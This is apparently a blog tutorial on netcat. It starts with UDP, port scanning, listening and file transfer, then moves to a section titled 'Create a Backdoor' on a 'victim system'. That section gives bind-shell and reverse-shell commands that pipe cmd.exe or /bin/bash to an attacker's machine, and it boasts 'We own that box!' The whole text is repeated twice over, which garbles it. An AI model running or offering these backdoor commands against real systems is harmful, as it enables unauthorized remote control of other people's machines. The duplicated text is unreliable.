---> If you would like to send a UDP packet instead of initiating a TCP connection, you can use the
-u option:
# netcat -u host port
---> Use Netcat for Port Scanning
# netcat -z -v domain.com 1-1000
---> Communicate through Netcat. you can tell netcat to listen to a specific port for connections. We can do this by providing the -l parameter and choosing a port:
# netcat -l 4444
This will tell netcat to listen for TCP connections on port 4444. As a regular (non-root) user, you will not be able to open any ports under 1000, as a security measure. On a second server, we can connect to the first machine on the port number we choose. We do this the same way we've been establishing
connections previously:
# netcat domain.com 4444
---> How To Send Files through Netcat
Because we are establishing a regular TCP connection, we can transmit just about
any kind of information over that connection. It is not limited to chat messages that
are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
# netcat -l 4444 > received_file
On the second computer, create a simple text file by typing:
# echo "Hello, this is a file" > original_file
We can now use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted just as if we had typed it interactively:
# netcat domain.com 4444 < original_file
We can see on the computer that was awaiting a connection, that we now have a new file called "received_file" with the contents of the file we typed on the other computer:
cat received_file
---> Create a Backdoor
Create a backdoor on the victim system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.
For Windows we use:
# nc -l -p 6996 -e cmd.exe
For Linux we use:
# nc -l -p 6996 -e /bin/bash
This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system. Then on our attacking system, we type:
# nc 192.168.1.105 6996
As you can see, the Windows command prompt has been piped through our netcat connection directly to our attacking system! We own that box!
Creating a shell:
---- ---- ----- ----
Remote machine: # nc -l -p 6996 -e /bin/bash
Local machine: # nc 192.168.134.128 6996
Creating a reverse shell:
---- ----- ----- ----- -----
Local machine: # nc 192.168.134.128 6996
Remote machine: # nc -e /bin/bash local_machine 6996
# nc -e /bin/bash -l -p 6996 192.168.134.129 &
-u option:
# netcat -u host port
---> Use Netcat for Port Scanning
# netcat -z -v domain.com 1-1000
---> Communicate through Netcat. you can tell netcat to listen to a specific port for connections. We can do this by providing the -l parameter and choosing a port:
# netcat -l 4444
This will tell netcat to listen for TCP connections on port 4444. As a regular (non-root) user, you will not be able to open any ports under 1000, as a security measure. On a second server, we can connect to the first machine on the port number we choose. We do this the same way we've been establishing
connections previously:
# netcat domain.com 4444
---> How To Send Files through Netcat
Because we are establishing a regular TCP connection, we can transmit just about
any kind of information over that connection. It is not limited to chat messages that
are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
# netcat -l 4444 > received_file
On the second computer, create a simple text file by typing:
# echo "Hello, this is a file" > original_file
We can now use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted just as if we had typed it interactively:
# netcat domain.com 4444 < original_file
We can see on the computer that was awaiting a connection, that we now have a new file called "received_file" with the contents of the file we typed on the other computer:
cat received_file
---> Create a Backdoor
Create a backdoor on the victim system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.
For Windows we use:
# nc -l -p 6996 -e cmd.exe
For Linux we use:
# nc -l -p 6996 -e /bin/bash
This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system. Then on our attacking system, we type:
# nc 192.168.1.105 6996
As you can see, the Windows command prompt has been piped through our netcat connection directly to our attacking system! We own that box!
Creating a shell:
---- ---- ----- ----
Remote machine: # nc -l -p 6996 -e /bin/bash
Local machine: # nc 192.168.134.128 6996
Creating a reverse shell:
---- ----- ----- ----- -----
Local machine: # nc 192.168.134.128 6996
Remote machine: # nc -e /bin/bash local_machine 6996
# nc -e /bin/bash -l -p 6996 192.168.134.129 &
No comments:
Post a Comment